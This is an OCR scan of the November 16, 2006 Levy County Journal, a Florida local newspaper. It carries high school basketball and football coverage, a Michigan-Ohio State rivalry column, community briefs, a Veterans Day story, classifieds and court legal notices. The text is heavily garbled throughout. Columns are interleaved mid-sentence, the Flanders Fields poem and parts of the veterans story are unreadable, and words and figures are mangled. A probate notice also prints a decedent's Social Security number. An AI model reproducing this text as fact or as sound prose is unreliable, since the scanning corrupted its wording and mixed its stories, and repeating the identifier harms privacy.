Chiefland High School Vars), Boys Varsity/ J.V, Basketball Friday/Saturday 11/17-11/18 (Vars) e Chiefland High School Tip-Off Classic Monday 11/27 Seven Rivers Thursday 11/30 P.K. Young Friday 12/1 Williston Lutheran Tuesday 12/5 @ Taylor County .,;;( Thursday 12/7 Newberry,':"' .' , SFfiday-12/8 Dixie County - Monday 12/11 Trentot-., Girls Varsity/ J V, Basketball Thursday 11/16 @ Dunnellon ,&S Monday 11/20 Ft. White tc Tuesday 11/21 Newberry_ Tuesday 11/28 Williston (Vars) Thursday 11/30 @ The Rock (Vars Monday 12/4 @ Ft. White Monday 12/11 Trenton Tuesday 12/12 @ Bell ilaoSportsj & NEAL FISHER SLEVY COUNTY JOURNAL College football is about the rivalry Among the more painful losses the team endured this year was to cross county rival Williston, Ocala Trinity Catholic (by a 65-0 score) and Yulee (a first year program). Following the ouster of Sam Holland, the new coach had a tough road to haul in replacing a man who led the team to a state championship and unparalleled success during his tenure. However, in the eyes of many in the community he did little to cultivate the faith and belief a coach needs to have when rebuilding a program. Perhaps his waterloo came when he called in sick as the team traveled to the Jacksonville area to face Yulee. It also did not help his cause that Holland remarked on his way out the door that "whomever the new coach is, he is walking into a gold- mine of talent." That goldmine was severely stripped from the outset of Rast's term as the Indians' best player and running back bolted with Holland. The ^ifte 'LJmet fYlceX fcOuL LLam d.a ZA mmgnz bimne on by and Browse Local Artists' Gallery of Equine, Westernand Landscape Art Antique Consignmen m ue,- Sa llam-5pm tSeind aiW' at 40 VW lt St.in Wii6ton QUALITY HEALTH CARE FOR THE ENTIRE FAMILY r PL AND .k ~ .DICAL ENTEI trend continued as sever. of the players left the tear during the year. The team has quickly fallen from grace. Th Indians' record in 2003 wi 9-1. However since the their records have been 6- 2-7 and this year's 1-9 mark Cliff Norris, th superintendent of Lev County schools, made th decision to relieve Holland his duties and hire the Indian most recent coach. Now th position is vacant and y again a new search begins earnest. At the current tin indications are that no one being considered. Norris was unavailable fi comment. Chiefland Principal Pame Asbell indicated the decisic to resign was up to Rast an solely his choice. The coach remarked h made the decision base on the Quarterback Club request for his resignation. Rast will remain Chiefland High School as teacher. Looking Ahead . Leslie Sapp B Construction, Inc. 352-463-7589 7239 S.W. 80th Avenue tlsapp@acceleration.net Trenton, Florida 32693 CR-C058431 3 Eager Contracting Inc.l T- M @6@2@9elDlzlcp)~ e s Michigan prepares to travel to y / Columbus this weekend to take ie on their most eminent rival, the of A Ohio State Buckeyes, the game s' goes beyond just college football. It is what ie any sports fan and maybe even a few devotees et of the dramatic inkling wants. in As if playing for the championship of the ie nation's oldest conference, the Big Ten, a berth is in the granddaddy of all bowls, the Rose Bowl and a possible national title, one more time, as or they have done several times in the past, isn't enough, consider what the production of the la 2006 version of 'The Big Game' brings to the )n sport with an overwhelming flair. id It is two teams trying to put the exclamation point on the brilliance of a majestic season ie against one of the sport's historically five most ad accomplished programs in the game that makes 's or breaks their season. It is number one versus number two on the at final regular season weekend of 2006. It is a two teams playing for a perfect season. It isn't just one of the teams needing to win in order to move onto the national championship game, while the other squad enters the game looking to savor the euphoria of derailing their op- ponents' days of hard work at the last possible moment. It is both teams needing to win in order to move onto the championship game. And other than the Oklahoma-Nebraska rivalry, no other combination of two teams have as much of a all right to claim they should play each other in what is essentially the sport's biggest stage, a final four playoff game. Adding to the foreground of its sports splendor, the game will be played at a time of the year and in a location when the weather perfectly lends itself to the way football was supposed to be played. The air will be cool and crisp with just enough of an indication that winter's onset is looming in the background to make it a game about the uglies who toil in the trenches and ground warfare. But the weather will be clear enough to add Just erioigh~of'the magicalPelment of swing- inmg -t~hMibi m fiWi l 'ht f6Atl id flow: of foaf- ' ball game that a beautiful1lydxecuted pass-play brings to a contest of this magnittide. College football is about the rivalry. Play- ers go to schools solely for the right to play the end of the season rival. They live to beat ) their cross-city, state or region nemesis and all is right with the world for the next year as the victory against the big rival lives on. The rivalries are so big that they are played on the last weekend of the season. But how many could match the gran- deur, the pageantry and what the rivalry between Michigan and Ohio State has meant to the sport? It' is "the big game" not only in the tangible sense of champi- onships and the attention it has brought to college"football, but also because in the arena of drama and the aftereffects it has created rivalry few can match. Before this year only a handful of rival- ries could match what this yearly battle has brought to the table. Among the accolades are a nationally leading 17 national titles, 74 bowl appearances, 38 bowl victories, 16 Rose Bowl championships, 70 Big Ten titles, 47 appearances in bowls that have become a part of Bowl Championship Se- ries and 7 Heisman Trophy winners. In fact, only 68 percent of the time, the winner of the "the big game" did not claim the Big Ten title and the automatic berth in the BCS or Rose Bowl that goes with it. To further illustrate the point this marks the fifth time the two rivals play each other being ranked first and second once among most among any of the season ending rivalries. On the more non-tangible side the rival- ry is littered with names and traditions that make it impossible for fans to know about it. Names like "The Big House", "The Horseshoe", Bo, Fritz, Bump, Fielding, Woody, AC, and Archie, traditions like the go M blue banner and the dotting of the I and the maize and blue and the scarlet and gray color schemes are known nationally and roll off the tongues of sports fans. They are one or two word names, be- cause there is nothing else that needs to be said. Sports fans know what they did or. mean. In fact, the series moniker in itself is short and succinct. It needs no explana- tion. Both schools boast consecutive sellouts of over 100 games. "The Big House" is the largest outdoor stadium in the world. '"The' Horseshoe" has been meashued to carry the largest decibel aimioui'of any outdoor stadium. Every school has its big rival and it means just as much to the players and those involved with the school, but when a series has those kinds of monikers, it is one of the elite. See NealPage 13 LEVY COUNTY JOURNAL SPORTS & RECREATION THURSDAY, NOVEMBER 16, 2006 Page 13 Team will rely on speed, experience INeal BY NEAL FISHER SPORTS WRITER WILLISTON-With Jason Odom taking over the reins of Williston's basketball pro- gram, the team might have to take a step backward before it can go forward. On the other hand, with five returning starters who have a world of talent they might just give Williston High School something to wave their pitchfork about. "Right now we are learn- ing the basics and fundamen- tals," Odom said. "The team lost in the first round of the district tournament last year and played around .500, but I think we can really improve both this year." "We have a lot of speed on this team and the girls are naturally athletic. The team is improving every practice and I think we will really be playing our best as the season progresses." The coach takes over a team that played a compli- cated offense and defensive scheme last year. With the talent level of the team he has installed a flexing 2-3 zone on both offense and defense. The offense is designed to swing the ball around the perimeter until the opposi- tion wears down and gives the Lady Devils an open shot or an open lane for them to drive. With the open play- ers from top to bottom in the paint, the defense has to collapse down and give the Lady Devils room to move the ball. The defense is a basic 2-3 static zone, but the coach has integrated a full court 1-3-1 press into their game plan. Look for the team to use the natural athleticism that ,the coach talked about to switch back and force and tire their opposition out. After two pre-season games, the jury is still out as far as where exactly the team is when it comes to their abil- ity to execute Odom's new scheme and game plan. But they certainly have proved they are not a team to take lightly and improvements are being made on regular basis. They won their first con- test by a 60-35 score over Hamilton County and lost their second game to Fernan- dfna Beach by a narrow two points. The team's starting five consists of Jasmine Smith, Margaret Brown, Portia Brown, Angel Floyd and Ciearra Gordon. With four seniors starting it is unfortu- nate they will have to adapt to a new system and, feel for the game. However, the experience of the team will make it an easier transition to the new coach than a team with fewer seniors. Margaret Brown is the lone starter who is not a senior. She is a junior. But the team's flow and rhythm begins and ends with her abilities and what she brings to the court. The team's point guard is an excellent field general, know- ing when to pass, when to shoot and who is in the best position to get the ball. She also has an excellent shot. Odom expects her to com- pile a strong turnover to as- sist ratio during the season. As the point guard, it is an- ticipated that she would take over the leadership role on the team and has done so. The team's center, Gordon, is a powerful shot blocker and rebounder. Using her 6- foot frame, the long and lean -body has become adept at us- ing her long arms to get to the ball and grab it. As the team's forward, Portia Brown complements Gordon well. She is also a good rebounder. Her strength is her ability to block out in order to get the ball. She is an extremely aggressive player.who gets to almost ev- ery loose ball. Angel Floyd line ups at the shooting guard. Along with Brown, she is the team's best shooter. A slasher, she stores in bundles and will be needed to give the team points. She also leads the team on the de- fensive side of the ball, meet- ing the opposition as they cross half court. The other guard is Jas- mine Smith. She is a versa- tile player, playing both the wing position and point when Brown needs a rest. Playing in the frontcourt, sophomore Jessica Gates will spell the starters as she comes off the bench. Odom noted her energy and ability to play bigger than she is as well as her deceptive physi- cal strength. The other non-starter who will see significant time is Samone Kennedy. The tal- ented guard still needs pol- ishing, but she will have her opportunities during the sea- son to grow into the role that the team needs her to play. "We still have some things that we need to work on, but the improvement is promis- ing and the preseason games have made a difference," Odom said. "The demeanor towards the game has really changed.for the better. When we first started we only had six girls show up, so there. was a lot of negativity. "But the pre-season games have given the team confi- dence and it can be seen as we get better during every practice. They are staying within the limits of their abil- ity and are playing bigger than they are. The results as far as improving and the players getting the most out of their players have been there because of it." The team as it enters its first season under Odom also has grown stronger in- their ability to see the floor better. However, the team needs to fine-tune their shot. They have been working on the fundamental of.a sound shot, such-asisquaring to the basket and jumping off of the right foot. With only nine players, depth will become a problem if injuries become an issue. Odom is a graduate of P.K. Yonge and the University of Florida. He takes over the Lady Devils program after a successful athletic career at the high school level. There is Oklahoma-Ne- braska, Auburn-Alabama, USC-Notre Dame and Florida-Florida State and they can all compete with the credentials of "The Big Game." However with the scenario that has set up the 103rd meeting between Michigan and Ohio State, I hereby de- clare "the big game" is now number one among college football's finest rivalries. Not only did "the big game" add to its legacy in stats and its national promi- nence this year, but it has brought the college football season to a mouthwatering crescendo that even the other rivalries failed to match when they played each other as the top two teams in the land. The crescendo has come in ways never before seen, such as 111 press passes being issued and a reporter from Japan planning to attend the game. There has never been a game that was in essence a final four playoff game and Continuedfrom page 12 this year's "The Big Game" will be one that forever changes the feel of how col- lege football crowns its national champion. It will be the culmination of a season in which both teams and the game in itself will distinc- tively add their fingerprints to the sport in a way never before seen. Neal Fisher is the sports writer for the Levy County Journal. He may be reached at jcpirahna@yahoo.com. 200 FHA' las 3AF otba I hamionhi Host leams are In bold Italics Regional games at 7.30 p m local time unless otherwise noted Scrooi reps report resuitsalrrangeninr to foolballifhsaa org Football Comings and Goings: In the 10 and under league, the Bronson Packers scored an impressive '24-0 shutout victory over the Williston Knights. In the 13 and inder league, the Bronson Thunder suffered defeat at the hands of the other Williston team. The football playoffs began on Saturday, Nov. 11. Times and opponents are still to be determined. Cheerleading Notes:; The All-Star Cheerleading squad will travel to St. Augustine for a statewide competition on Nov. 18. The squad is composed of 23 girls ranging from ages five to 23. Soccer Doings: Last week's soccer results: The Bronson Little Eagles captured a 3-0 shutout over Newberry I in the 6 and under league. The Bronson Little Gators fell to Archer by a score of 3-2. It was not a good day for the 8 and under league as the Bronson Eagles I managed to tie High Springs at 1-1. However, the Bronson Eagles II, by a score of 2-1, went down to defeat at the hands of Williston II. In the 10 and under league, it was the Eagles taking a 1-0 decision over Newberry II. The Eagles fell by a 1-0 count to Alachua II in the 12 and under league. A 2-2 tie was the final result of the Eagles match against Alachua I in the 14 and under World Cup, was played on league. ,Friday, Nov. 11 and Saturday, The league's post season Nov. 12 at the Alachua tournament, the Alachua Recreational Center. WILLISTON LADY DEVIL BASKETBALL 2006-2007 JASMINE SMITH SHARNEKA BROWN MARGARET BROWN ARNETRA RICHARDSON PORTIA BROWN ANGEL FLOYD CIEARRA GORDON SIMONE CANNADY JESSICA GATES ERICA WILLIAMS #4 #5 #10 #12 #22 #23 #24 #25 #32 MGR. SENIOR SENIOR JUNIOR FRESHMAN SENIOR SENIOR SENIOR FRESHMAN SOPHOMORE SENIOR HEAD COACH JASON ODOM ASSISTANT COACH ANTHONY JOHNSON T For the best in local sports coverage, read the Levy County Journal. Williston High School Lady Red Devil Basketball 2006-07 Schedule Date Opponent Location Time. 11-14-06 Noith Marion Away 6:00 11-16-07 St. Francis Catholic Away 7:00 11-20+06 The Rock Away 5:30 11-21-06 Interlachen Home 6:00 11-28-06 Chiefland* Home 7:00 11-30-06 Hawthorne Home 7:00 12-01-06 Ft. White* Home 7:00 12-05-06 Newberry* Away 7:00 12-07-06 Dixie Co.* Home 7:00 12-11-06 P.K. Yonge* Away 7:00 12-14-06 Crystal River Away 7:30 1-05-07 Chiefland* Away 7:00 1-09-07 Dixie Co.* Away 7:00 01-11-07 North Marion Home 7:00 01-12-07 Ft. White* Away 7:00 01-16-07 Newberry* Home 7:00 01-18-07 P.K. Yonge* Home 7:00 01-19-07 Interlachen Away 6:00 01-25-07 Crystal River Home 7:00 01-26-07 Hawthorne Away 6:00 01-30-07 *DISTRICT TOURNAMENT @ P.K. Yonge* Bronson Youth I S ", ",', ': f Lssl upialed FridaV November 10 2006 at 11 36 PIA Page 14 LEVY COUNTY JOURNAL AROUND LEVY COUNTY THURSDAY, NOVEMBER 16, 2006 ACS Great American Smokeout is today NewBriefg i The Great American Smokeout is today, Nov. 16. Lay down the cigarettes and start your way to a healthier you. The American Cancer Soci- ety today marked its 30th an- nual Great American Smoke- out The American Cancer Society urges the residents of Levy, Gilchrist, Dixie and Lafayette counties to make an effort to quit smoking. Secondhand smoke is a health hazard that contains more than 4,000 chemicals, including over 60 carcino- gens. In addition to increas- ing the risk of heart disease, stroke, and cancer in non- smokers, secondhand smoke is also responsible for 35,000 40,000 deaths from heart disease and 3,000 lung can- cer deaths in nonsmokers an- nually. It's inconceivable, but the tobacco industry spends more than $15.4 billion per year and ore than $42 mil- lion per day advertising and marketing its lethal products. Smoke-free polices, like Flor- ida's amendment six, cover all workplaces and protect workers and patrons from .the dangers of secondhand smoke. These policies also allow those most vulnerable to secondhand smoke expo- sure the elderly, children, and people with certain health conditions to enjoy dining out without compromising their health. Neither ventila- tion systems nor nonsmoking sections can adequately pro- tect people from exposure to the free-floating poisons of secondhand smoke. More than 70 percent of smokers want to quit and attempt to do so each year, but without help, most fail. Smoking cessation coun- seling and medications are proven to help and effective- ly improve quit rates. Tele- phone-based services are a convenient and effective way to provide information and counseling; therefore, Quit- lines have quickly become the most successful means of achieving tobacco cessa- tion for large populations, nearly doubling the chances that tobacco users will quit successfully. The American Cancer Society is dedicated to offering help to those who want to quit smoking. Please call 1-800-ACS-2345 (1-800- 227-2345) to reach a Quitline program near you. The American Cancer So- ciety is dedicated to eliminat- ing cancer as a major health problem by saving lives, di- minishing suffering and pre- venting cancer through re- search, education, advocacy and service. Founded in 1913 and with national headquar- GETTING READY to combat smoking are, from left, Maggie Cash, Valerie Boughanem, Principal, Matthew.Myers, Kim Nemethand Bobbie Burnett. ters in Atlanta, the Society has 14 regional divisions and local offices in 3,400 commu-. nities, involving millions of volunteers across the United States. For more information anytime, call toll free 1-800- ACS-2345. The task force against teen drug use is planning activities at Bronson Middle and High School. Some of the activities in- clude asking businesses to participate by offering dis- counts to people who turn in the rest of their pack of ciga- rettes because they want to' stop smoking. There will be a jump rope contest during PE to prove the importance of a healthy heart and lungs. Students, parents and business people are encouraged to adopt a smoker by enabling them to stop smoking. Students who do not smoke will speak about the impor- tance of never starting. Stu- dents who have quit will speak about "Quitters are winners". Other informational activi- ties will be helpful including daily announcements, posters throughout the school, and a banner for students to sign with ideas of ways, to stop smoking or never starting to smoke. Ideas: Adopt a Smoker and encourage them to quit and be there for them. See the following website: http:// PED/ped 10 4.asp Businesses could offer a discount to people .who turn in the rest of a pack of ciga- rettes. Other helpful websites:. com/kopykit/reports/smoke- out.htm. Yard sale The New Sepulchre Church of God, Bronson will be holding a yard sale on Saturday, Nov. 18 starting at 7:30 a.m. A free breakfast will be served consisting of hot fish and grits. New Sepulchre Church is located at 431 Pine, Street, Bronson. Basket auction set Friends of the Williston Library will hold its annual holiday open house and basket auction Saturday, Dec. 9 from 10 a.m. until 2 p.m. at the library on Noble Avenue. Silent bids will be received on the baskets and proceeds, will assist in the purchase of books, materials and4 equipment for the library. It will also enable the Friends to provide free educational and entertaining programs throughout the year. EZDA meetings ' Enterprise Zone Develop- ment Agency will meet Tues- day, Nov. 28 at 9 a.m.; Levy Abstract & Title, 50 Picnic St., Bronson. Tentative meetings, ifneed- ed, will be, held in the samn location Dec. 5 and Dec. 12I at 9 a.m. The agenda includes finalizing/revising the Enter' prise Zone application. For more information con- tact Pam Blair, Enterprisie Zone Development Agency at 352-486-5470. .L."I Erica Alien of the Inglis Shell Station reads the LEVY COUNTY OUROLN HE COUNTY PAPE EST. 1 92 Also available at these locations: Bronson A Post Office Park Ave Church's Chicken/Jiffy .3000 Dollar Tree US 19 Gas Mart Yogiraj En- ter19 Erica Allen is a resident of Inglis and is an evening CSR at The Inglis Shell Station. When she's not busy with her customers, Erica enjoys reading the Levy County Journal's current events. Pick up your copy today. You'll be glad you did. To subscribe: call Robin at 490-4462 We accept Visa/Mastercard Two locations to serve you 440 South.Court St., Bronson 13 South Main St., Chiefland i/ISA v Journal photo by Rhonda Griffiths Am LEVY COUNTY JOURNAL THURSDAY, NOVEMBER 16, 2006 SALUTING THE LIVING Williston pays tribute to its vets BY CAROLYN RISNER M ,r., ,-e| [-_f'C,1, w \' ILLIS T(-)N-Desci ibed as a scene Norman Rockwell \would ha\e painted tor the Samtrdai Evening Post. the cit. of Williston came to- gether Saturday to pa\ tribute to this nation's heroes--our military men aid \women. From the posting of the colors b\ ,Williston High School's Jr. ROTC to the moving solo of God Bles-s the U'S. the e\enine \\as filled with an air of patriotism and pride. Video clips honoring \ eter- ans \'ere played to the more than 150 people \'ho gath- ered on Veterans Da\ and the high school band mo\ed the audience \ith the national anthem and several patriotic selections. The band also played each military, branch's theme and veteranss stood to rousing ap- plause when their branch \\as noted. "It doesn't get anymore American than this," said Rep. Larrm Crerul. the e\e- ning's ke) note speaker. Cieul commllended Ihe 25 million people \\ho ha'e seized this country,. noting tihe cone from all economic, racial and so- cial backgrounds. "They are oul he- roes." lie said. \\ ith UiS solider, in 138 countries. Cretul said, As Americans. \e don't give up, gi\e out or gile in. \\e press onward holding up our country to a high stan- dard." L" L VETERANS FROM all branches were honored Saturday in Williston. Some shared stories with their comrades, above, while others like Robert Lowyns, left, stood proud- ly, or Michael Thayer and James Taylor chatted with friends, right. U I III Flanders Fields BY Lielitenaant CoI'onl I-An I. C'ra., M IE) (1 i 1 )1 ;) Can:Jian -\rni IN FL-AKLi4i0,5 FIELDS [ I Iicl ecin the *l,.: rc.v, .i-.i1 r...4, Tklt narL cLi r pl.-,..-: and in tke z k Thme ImL. z, tilIrml e iil 1 -Sc.,rc. k.erJ:l aid t~~~Ike nz elon L\ el iand "ere Ic' .-d, anl nol 1'e i In Ilandorz MI lake UP CLp qjLiarr i d1 the kfo: T, Nou from fai? tialv np hnd s v 16--a TkIm torch, .le %-.rL- t.." moldit 11 1,11. i e brea- mitI ,idI, uz Li, % die Ve hall not Lep, thruLICl P--.PpiF rOV in Flanlz J..'bLd,. Journal photos by Carolyn Risner THE WILLISTON JUNIOR ROTC posted the colors, right, while music from many sources mbved the crowd. Pvt. Zach Russ, left, was among those recognized who are currently serving our country. I. T Page 15 \~ h rz- ;; r I A ' P: - W, ir;41 THURSDAY, NOVEMBER 16, 2006, LEVY COUNTY JOURNAL Page 16 Classified Deadline Monday 2 p.m. egals COUNTY OT COUNTY IAll *n T. B2 El@leNvjournal.com Visit: 13 South Main Street, Chiefland Bronsbn 352-486-2312 Bronson 352-486-5042 440 South Court Street, Bror Miscellaneous U 125 servi, 130 FREE FIREWOOD, sawed. Call 486-2118. 11/16f *FREE KITTENS -All gray, about 10 weeks old. 2 male, 2 female. Call Cassidi at 352-577-4399. 11/16f rentals 61 3 0 Want to 335 LEVY COUNTY JOURNAL re- porter needs a place to lay his head at night. Outstanding sports writer is forced to commute three hours and really wants to make a home base in Levy County. If you have a spare room, small apart- ment or mobile home you want to rent for $200-$300 a.month or if you need a roommate to share expenses, call Neal at 813-335- 1095 or 352-490-4462. real Estate Houses for i 410 CORNER LOT WITH 2 "Cracker Houses" in Williston. Close to everything, downtown, banks, Hwy 27-A & Hwy 41. City water & sewer, located on paved road at NE 9th Street. $20,000 obo. 352-208-3200 cell. 11/16p Mobile HOi 415 for Sale SINGLE-WIDE mobile home, 2 BR with expansion, needs work, $2000. You move at your expense. 352-486-2248. 12/6b Mobile Hia 415 for Sa , MUST SELL! MOVING out of state. 3/2 doublewide with split plan. 1% acres, large trees, carport, covered back porch, tractor and tool shed. $95,000. Call 352-486-7027 11/16b 425 for 5 2 ACRE BETWEEN Williston & Morriston. Paved road frontage on SR 121. Wooded! High and dry! Owner financing. No down payment. Only $359/mo; total: $34,900.00. Call 352-215-1018. 11/16p For Sale 5 .. .. - 510 FAT GOOSE AUCTION holding estate auctions each Friday in downtown Chiefland at 7:00 pm. Always-outstanding estate merchandise. Our box lots start at 6:30 pm. Several vintage Lionel & American Flyer Train sets from the early 30's, & 40's the rare MTH Burlington Zephyr set in its box. Large statues, carved ivory pieces, artwork of all types, items from 3 different antique stores. Primitives of all types fainting couch, crocks, oxen yoke, great glassware, lots of jewelry. Furniture early drop leaf mahogany table, also a nice mahogany sewing chest w/ glass knobs and contents, large slab coffee table, matching hutches, fishing gear and all types of smalls, tools, and lots more. AU2738 (Bruce Denestein) AB2565 10% BP For more info. call Jim Morehead at (352) 356- 1065. YardS 5 515 YARD SALE SAT. Nov. 18, 7- ?. Go North on 337 past Levy County Jail about 4 miles to 126th Street and turn left. First big yellow house on right. 352- 486-8141. 550 Misc NEW MOWER & CHAIN SAW PARTS: Stihl, Husqvarna, Ayp, Murray, Sears, MTD, Briggs, Kohler, Robin, and Honda. Blades for most mowers. Beau- champ Saw Shop. 352-493-4904 1/14/07 This space for sale. Call Robin to purchase at a low rate 490-4462 BRONSON SELF STORAGE (352) 486-2121 HOURS: Monday Friday 10 am 5 pm Saturday 10 am 3 pm 839 E Hathaway Ave Behind Dollar General S Want to WILLISTON RECYCLE Salvage $50.00 premium for cars or trucks. Cash for all types scrap metal. Call today 528-3578. 12/7p recreation 6 605 0 Boats & MOBILE MARINE SERVICE - Boat motors wanted, dead or alive! 352-486-4316 12/28p Legal I" 9( IN THE CIRCUIT COURT OF THE EIGHTH JUDICIAL CIRCUIT IN AND FOR LEVY COUNTY, FLORIDA. CASE NUMBER: 06-CA-662 DOREEN M. CASLE Plaintiff, VS, T. RICHARD HAGIN and T. RICHARD HAGIrASiRTRUSTEE Together with their heirs, should they be deceased, and any natural unknown persons who might be the unknown spouse, heirs, devisees, grantees, creditors, unknown Tenants or other parties claiming by, through, under of against the above-named defendants Defendants. NOTICE OF ACTION To: T. RICHARD HAGIN and T. RICHARD HAGIN AS TRUSTEE You hereby are notified that a Complaint to Quiet Title was filed in this court on August 10, 2006. You are required to serve a copy ofyourwritten defenses, if any, on the petitioner's attorney, whose name and address is: Sherea- Ann Ferrer, P.O. Box 721894 Orlando Florida 32872, and file an original with the clerk of this court on or before December 22, 2006 Otherwise, a judgment may be entered against you for the relief demanded in the petition. Property Description: TRACT #63 University Estates, an unrecorded subdivision, in Section 16, Township 12 South, Range 17 East, Levy County, Florida, being more particularly described as follows: The North 1/2 of the Southeast /4 of the Northeast of the Northeast ' of the Northeast % of Section 16, Township 12 South, Range 17 East, Levy County, Florida. Witness my hand and seal on November 6, 2006. GATOR WOKS COMPUTING Soles. Repair. Upgrade SConsulting [e w'. M Programming fNetworking MR'csoA' Computer Training Classes 900 Ln DANNY J. SHIPP Clerk of the Court By: Gwen McElroy Deputy Clerk (COURT SEAL) Pub: Nov. 16, 23, 30 Dec. 7, 2006 IN THE CIRCUIT COURT FOR LEVY COUNTY, FLORIDA PROBATE DIVISION File No.: 38-2006-CP-000057 IN RE: ESTATE OF SONIA L. JOHNSON Deceased. NOTICE TO CREDITORS The administration of the estate of Sonia L. Johnson, deceased, whose date of death was May 23, 2005, and whose Social Security Number is 299- 40-6564, is pending in the Circuit Court for Levy County, Florida, Probate. Division, the address of which is 355 South Court Street, Bronson,. Florida 32621. The names and addresses of the personal representative and the personal representative's attorney are sAe forth be ."". " All creditors of the decedent and other persons having claims or demands against decedent's estate on whom a copy of this notice is required to be served must file their claims with this court WITHIN THE LATER OF 3 MONTHS AFTER THE FIRST PUBLICATION OFTHIS, 2006. 900 Legal Personal Representative: Shelia Kay Hand 17790 SE 60th Lane Morriston, Florida 32668 Attorney for Personal Representative: THE LAW OFFICE OF RICHARD M. KNELLINGER, P.A. Karen S. Yochim, for the Firm Attorney for Personal Representative 2815 NW 13h Street, Suite 305 Gainesville, Florida 32609-2865 Telephone: (352) 373-3334 Florida Bar No. 670847 Pub: Nov. 16, 23, 2006 IN THE CIRCUIT COURT FOR LEVY COUNTY, FLORIDA PROBATE DIVISION File No. 38-2006-CP-0288 IN RE: ESTATE OF CHARLES AUSTIN, FREDERICK Deceased. NOTICE TO CREDITORS The administration of the estateofCHARLES FREDERICK AUSTIN, Deceased, whose date of death was August 4, 2006, File Number 38-2006-CP- 0258, I00 Legal BARRED. NOTWITHSTANDING THE TIME PERIOD SET FORTH ABOVE, ANY CLAIM FILED TWO (2) YEARS OR MORE AFTER THE DECEDENT'S DATE OF DEATH IS BARRED. The date of first publication of this Notice is November 16, 2006. BETTY W. AUSTIN Petitioner 11310 N.W. 73rd Court Chiefland, FL 32626 GREGORY V. BEAUCHAMP, P.A. Attorney for Petitioner P.O. Box 1129 Chiefland, FL 32644 (352) 493-1458 Florida Bar No. 178770 Pub: Nov. 16, 23, 2006 NOTICE OF PUBLIC SALE Dona Potter d/b/a Bronson Self Storage, pursuant to the provisions of the Florida Self Storage Facility Act (Fla. Stat. 83.801 et sec.) hereby gives notice of sale under said Act to wit: On December 9, 2006 at Bronson ,Self.,Storage, 839 .,. JEANNE TURNER P.O. BOX 1823 BRONSON, FL 32621 MELISSA DANIEL 11070 NE 110t Lane BRONSON, FL 32621 Consists of household, personal items or miscellaneous merchandise, stored at Bronson Self Storage, 839 E. Hathaway Ave., Bronson, FL 32621. Sale is being held to satisfy a statutory lien. Dated November 10, 2006 Dona Potter PO Box 1705 Bronson, FL 32621 Phone (352) 486-2121 Sale: 12/09/06 Pub: Nov. 16, 23, 2006 Don't go swinging blindly... I Let us help you give your advertising some L1TcoUNTY Jo[AL FO""'^'"'" *I LEVY COUNTY JOURNAL RI ASIFID IIFRAIS VI~IVV- -l Ur -- -- i THURSDAY, NOVEMBER 16, 2006 IN THE CIRCUIT COURT OF THE EIGHTH JUDICIAL CIRCUIT, IN AND FOR LEVY COUNTY, FLORIDA in b .disclosure .. of document1 and" information: Failure to comply can result in sanctions, including dismissal or striking of pleadings. Dated: October 27, 2006 CLERK OF THE CIRCUIT COURT By: LaQuanda Lalson Deputy Clerk Pub. Nov. 2, 9, 16, 23 Records of Levy County, Florida. Tax Parcel #19464-000-00 & 19466-000-00 DATED this 30t day of October 2006. CLERK OF THE COURT By: Gwen McElroy As Deputy Clerk Publication of this notice on Nov. 9, 16, 2006 in LEVY COUNTY JOURNAL IN THE CIRCUIT COUF OF THE EIGHTH JUDICIAL CIRC IN AND FOR LEVY COUNTY, FLORII CIVIL DIVISION Case No. 382006-CA-001 Civil Division SUN LIFE ASSURAF COMPANY OF CANADA Plaintiff, HOLY FAMILY CATHC CHURCH, DIANE CHISO JONES and JOSEPH E. PRI Defendants. NOTICE OF ACTION TO: MS. DIANE CHISO JONES 3205 N.W. 461 Court Ocala, FL 34482 Ms. DIANE CHISO JONES 2501 S.W. 101 St., Apt. # Ocala, FL 34474 YOUAREHEREBYNOTIF that an action for interple; and declaratory relief has t filed against you, Diane Chis Jones. You are required to se a copy of your written defer to this action, if any, on M D. Kiser, the Plaintiffs attor whose address is 101 Kennedy Boulevard, Suite 2 Tampa, Florida 33602, or before December 15, 2006, file the original with the Clel this Court either before ser on the Plaintiff's attorney immediatelythereafter; other a default will be entered agi you for the relief demand the complaint or petition. DATED on Oct. 30, 2006. Clerk of Circuit Court By Gwen McElroy Deputy Clerk Pub: Nov. 9, 16, 2006 IN THE CIRCUIT COUF OF THE EIGHTH JUDICIAL CIRC IN AND FOR LEVY COUNTY, FLORII Case No. 38-2006- 000888 1994 GMC, FLORIDA TAG V2 VIN 1GKCS13W9R252' TWO HUNDRED AND THI ONE ($231.00) DOLLARS U.S. CURRENCY WILLISTON POLICE APARTMENT Petitioner, DEONTE DALLAS Respondent. NOTICE OF ACTION TO: DEONTE DALLAS UNKNOWN PARTIES IN TEREST YOU ARE HEREBY N FIED that a complaint for Fo ture has been filed by the W ton Police Department, Willi. Levy County, Florida; and are required to serve a cop your answer or other plea on the plaintiffs attorney, RA THOMAS, JR. of RAY E. TH AS, JR. PA., at Post Office 39 Bell, Florida 32619, anc the original answer or plea in the office of the Clerk o1 above named Court on.or be December 21, 2006. IF YOU FAIL TO DO judgment by default will be en against you for the relief manded in the complaint. WITNESS my hand and cial seal, this 2nd day of No\ ber 2006. DANNY J. SHIPP Clerk of the Circuit Court Levy County, Florida P.O. Box 610 Bronson, FL 32621 By: Gwen McElroy Deputy Clerk (Court Seal) Pub: Nov. 9, 16, 2006 NOTICE OF INTENT ' USE UNIFORM METHOD COLLECTING NON-AE VALOREM ASSESSMEI Levy County, Florida ACounty@) hereby pro\ notice, pursuant to se 197.3632(3)(a), Florida Stati of its intent to use the uni method of collecting no valorem special assessrr IT to be levied within unincorporated area of UIT County, for the cost of provi solid waste disposal services DA residential and non-reside properties, fire protection serve 58 and road maintenance serv commencing for the Fiscal' NCE beginning on October 1, 20 The County will consider adoption of a resolution elec to use the uniform method collecting such assess authorized by section 197.36 )LIC Florida Statutes, at a pi )LM- hearing to be held at 9:00 ICE, on December 5, 2006 at Commission Chambers, 35i Court Street, Bronson, FIc 32621. Such resolution )LM- state the need for the levy will contain a legal descrip of the boundaries of the property subject to the Copies of the proposed 1 ILM- of resolution, which cont the legal description of the 305 property subject to the levy, on file at the Office of the Co Coordinator, 355 S. Court Sti :IED Bronson, Florida. All intere ader persons are invited to attend 3een In the event any pe olm- decides to appeal any deci erve by the County with res nses to any matter relating to Mark consideration of the resoll ney, at the above-referer East public hearing, a record of 700, proceeding may be needed Sor in such an event, such pe and may need to ensure tha rk of verbatim record of the pi vice hearing is made, which re or includes the testimony wise evidence on which the appe ainst to be based. In accordance d in the Americans with Disabi Act, persons needing a spi accommodation or an interpl to participate in this procee should contact Levy Count (352) 486-5217, 7 days pri( the date of the hearing. DATED this 23r day October, 2006. RT By Order 